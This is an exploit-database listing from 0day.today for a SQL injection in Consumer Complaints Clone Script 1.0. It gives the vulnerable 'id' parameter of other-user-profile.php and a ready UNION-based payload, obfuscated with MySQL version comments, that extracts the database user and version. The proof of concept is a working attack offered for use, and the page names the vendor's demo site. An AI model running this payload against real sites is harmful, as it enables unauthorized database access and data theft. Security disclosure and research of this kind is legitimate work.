[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Consumer Complaints Clone Script 1.0 - id SQL Injection Vulnerability

Author
Ihsan Sencan
Risk
[
Security Risk High
]
0day-ID
0day-ID-29165
Category
web applications
Date add
10-12-2017
Platform
php
# Exploit Title: Consumer Complaints Clone Script 1.0 - SQL Injection 
 # Dork: N/A 
 # Date: 08.12.2017 
 # Vendor Homepage: https://www.phpscriptsmall.com/ 
 # Software Link: https://www.phpscriptsmall.com/product/consumer-complaints-clone-script/ 
 # Demo: http://fxwebsolution.com/demo/consumer-complaints/ 
 # Version: 1.0 
 # Category: Webapps 
 # Tested on: WiN7_x64/KaLiLinuX_x64 
 # CVE: N/A 
 # # # # # 
 # Exploit Author: Ihsan Sencan 
 # Author Web: http://ihsan.net 
 # Author Social: @ihsansencan 
 # # # # # 
 # Description: 
 # The vulnerability allows an attacker to inject sql commands.... 
 #  
 # Proof of Concept:  
 #  
 # 1) 
 # http://localhost/[PATH]/other-user-profile.php?id=[SQL] 
 #  
 # -1'++/*!50000UNION*/(SELECT(1),/*!11111CONCAT_WS*/(0x203a20,USER(),VERSION()),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18))--+- 
 #  
 #  
 # # # # #

#  0day.today [2024-11-16]  #